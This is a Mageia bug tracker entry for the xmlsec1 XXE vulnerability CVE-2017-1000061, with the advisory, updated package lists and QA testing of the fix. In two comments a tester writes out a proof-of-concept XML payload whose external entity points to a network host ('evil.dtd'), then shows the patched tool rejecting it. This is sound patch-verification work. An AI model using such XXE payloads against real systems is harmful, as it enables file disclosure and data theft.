Bug 21586 - xmlsec1 new security issue CVE-2017-1000061
Summary: xmlsec1 new security issue CVE-2017-1000061
Status: RESOLVED FIXED
Alias: None
Product: Mageia
Classification: Unclassified
Component: Security (show other bugs)
Version: 6
Hardware: All Linux
Priority: Normal major
Target Milestone: ---
Assignee: QA Team
QA Contact: Sec team
URL:
Whiteboard: MGA5TOO MGA5-64-OK MGA6-64-OK advisory
Keywords: validated_update
Depends on:
Blocks:
 
Reported: 2017-08-21 16:43 CEST by David Walser
Modified: 2017-08-24 23:19 CEST (History)
5 users (show)

See Also:
Source RPM: xmlsec1-1.2.20-5.mga6.src.rpm
CVE: CVE-2017-1000061
Status comment:


Attachments

Description David Walser 2017-08-21 16:43:13 CEST
RedHat has issued an advisory today (August 21):
https://access.redhat.com/errata/RHSA-2017:2492

Mageia 5 and Mageia 6 are also affected.
David Walser 2017-08-21 16:43:18 CEST

Whiteboard: (none) => MGA6TOO, MGA5TOO

Comment 1 Marja Van Waes 2017-08-21 20:10:18 CEST
Assigning to all packagers collectively, since there is no registered maintainer for this package.

Assignee: bugsquad => pkg-bugs
CC: (none) => marja11

Nicolas Lécureuil 2017-08-22 01:27:59 CEST

CC: (none) => mageia
Version: Cauldron => 6
CVE: (none) => CVE-2017-1000061
Whiteboard: MGA6TOO, MGA5TOO => MGA5TOO

Comment 2 Nicolas Lécureuil 2017-08-22 01:28:35 CEST
pushed in updates_testing
src.rpm:
        xmlsec1-1.2.24-1.mga5
        xmlsec1-1.2.24-1.mga6

Assignee: pkg-bugs => qa-bugs

Comment 3 David Walser 2017-08-22 02:07:13 CEST
Advisory:
========================

Updated xmlsec1 packages fix security vulnerability:

It was discovered xmlsec1's use of libxml2 inadvertently enabled external
entity expansion (XXE) along with validation. An attacker could craft an XML
file that would cause xmlsec1 to try and read local files or HTTP/FTP URLs,
leading to information disclosure or denial of service (CVE-2017-1000061).

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000061
https://access.redhat.com/errata/RHSA-2017:2492
========================

Updated packages in core/updates_testing:
========================
xmlsec1-1.2.24-1.mga5
libxmlsec1_1-1.2.24-1.mga5
libxmlsec1-openssl1-1.2.24-1.mga5
libxmlsec1-nss1-1.2.24-1.mga5
libxmlsec1-gnutls1-1.2.24-1.mga5
libxmlsec1-gcrypt1-1.2.24-1.mga5
libxmlsec1-devel-1.2.24-1.mga5
xmlsec1-1.2.24-1.mga6
libxmlsec1_1-1.2.24-1.mga6
libxmlsec1-openssl1-1.2.24-1.mga6
libxmlsec1-nss1-1.2.24-1.mga6
libxmlsec1-gnutls1-1.2.24-1.mga6
libxmlsec1-gcrypt1-1.2.24-1.mga6
libxmlsec1-devel-1.2.24-1.mga6

from SRPMS:
xmlsec1-1.2.24-1.mga5.src.rpm
xmlsec1-1.2.24-1.mga6.src.rpm
Comment 4 Len Lawrence 2017-08-23 21:14:47 CEST
Testing this on mga5::x86_64, later.

CC: (none) => tarazed25

Comment 5 Len Lawrence 2017-08-24 11:34:13 CEST
mga5  x86_64

CVE-2017-1000061
PoC for XML External Entity attack.
https://github.com/lsh123/xmlsec/issues/43

Created file xinput.xml
$ cat xinput.xml
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.1.156/glabel.xml"> %remote;]>

Fake command:
$ xmlsec1 --verify --output output.xml input.xml 
input.xml:1: I/O warning : failed to load HTTP resource
TYPE root [ <!ENTITY % remote SYSTEM "http://192.168.1.156/glabel.xml"> %remote;
                                                                               ^
 %remote; 
         ^
input.xml:2: parser error : Start tag expected, '<' not found

^
Error: failed to parse xml file "input.xml"
Error: failed to load document "input.xml"
ERROR
SignedInfo References (ok/all): 0/0
Manifests References (ok/all): 0/0
Error: failed to verify file "input.xml"

Updated from Core Updates testing:

- lib64xmlsec1-devel-1.2.24-1.mga5.x86_64
- lib64xmlsec1-gcrypt1-1.2.24-1.mga5.x86_64
- lib64xmlsec1-gnutls1-1.2.24-1.mga5.x86_64
- lib64xmlsec1-nss1-1.2.24-1.mga5.x86_64
- lib64xmlsec1-openssl1-1.2.24-1.mga5.x86_64
- lib64xmlsec1_1-1.2.24-1.mga5.x86_64
- xmlsec1-1.2.24-1.mga5.x86_64

$ xmlsec1 --verify --output output.xml copy.xml
func=xmlSecNoXxeExternalEntityLoader:file=xmlsec.c:line=53:obj=unknown:subj=xmlSecNoXxeExternalEntityLoader:error=5:libxml2 library function failed:illegal external entity='localhost:/glabel.xml'; xml error: 0: NULL
copy.xml:2: parser error : Start tag expected, '<' not found

^
func=xmlSecParseFile:file=parser.c:line=400:obj=unknown:subj=xmlParseDocument:error=5:libxml2 library function failed:filename=copy.xml; xml error: 4: Start tag expected, '<' not found

Error: failed to parse xml file "copy.xml"
Error: failed to load document "copy.xml"
ERROR
SignedInfo References (ok/all): 0/0
Manifests References (ok/all): 0/0
Error: failed to verify file "copy.xml"

That appears to have worked.  The updated software refuses to entertain External Entities.
Comment 6 Len Lawrence 2017-08-24 11:38:41 CEST
Continuing from comment 5.
xmlsec1 looks like a standalone and
$ urpmq --whatrequires lib64xmlsec1_1
lib64aqebics0
lib64xmlsec1-devel
lib64xmlsec1-gcrypt1
lib64xmlsec1-gnutls1
lib64xmlsec1-nss1
lib64xmlsec1-openssl1
lib64xmlsec1_1
xmlsec1

shows that the library is required by other libraries.

Giving this the OK based on a clean install and a positive PoC test.
Len Lawrence 2017-08-24 11:38:58 CEST

Whiteboard: MGA5TOO => MGA5TOO MGA5-64-OK

Comment 7 Len Lawrence 2017-08-24 15:08:51 CEST
mga6  X86_64

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.1.3/evil.dtd"> %remote;]>

$ xmlsec1 --verify --output output.xml input.xml
error : Operation in progress
input.xml:1: I/O warning : failed to load external entity "http://192.168.3.1/evil.dtd"
!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.3.1/evil.dtd"> %remote;
                                                                               ^
 %remote; 
         ^
input.xml:3: parser error : Start tag expected, '<' not found

^
Error: failed to parse xml file "input.xml"
Error: failed to load document "input.xml"
ERROR
SignedInfo References (ok/all): 0/0
Manifests References (ok/all): 0/0
Error: failed to verify file "input.xml"

After updating the xml packages:
$ xmlsec1 --verify --output output.xml input.xml
func=xmlSecNoXxeExternalEntityLoader:file=xmlsec.c:line=53:obj=unknown:subj=xmlSecNoXxeExternalEntityLoader:error=5:libxml2 library function failed:illegal external entity='http://192.168.3.1/evil.dtd'; xml error: 0: NULL
input.xml:3: parser error : Start tag expected, '<' not found

^
func=xmlSecParseFile:file=parser.c:line=400:obj=unknown:subj=xmlParseDocument:error=5:libxml2 library function failed:filename=input.xml; xml error: 4: Start tag expected, '<' not found

Error: failed to parse xml file "input.xml"
Error: failed to load document "input.xml"
ERROR
SignedInfo References (ok/all): 0/0
Manifests References (ok/all): 0/0
Error: failed to verify file "input.xml"

This is good for 64-bits.
Len Lawrence 2017-08-24 15:09:39 CEST

Whiteboard: MGA5TOO MGA5-64-OK => MGA5TOO MGA5-64-OK MGA6-64-OK

Comment 8 Lewis Smith 2017-08-24 22:03:47 CEST
Validating under temporary policy as we have 1 test per release.

Keywords: (none) => validated_update
Whiteboard: MGA5TOO MGA5-64-OK MGA6-64-OK => MGA5TOO MGA5-64-OK MGA6-64-OK advisory
CC: (none) => lewyssmith, sysadmin-bugs

Comment 9 Mageia Robot 2017-08-24 23:19:24 CEST
An update for this issue has been pushed to the Mageia Updates repository.

http://advisories.mageia.org/MGASA-2017-0305.html

Status: NEW => RESOLVED
Resolution: (none) => FIXED


Note You need to log in before you can comment on or make changes to this bug.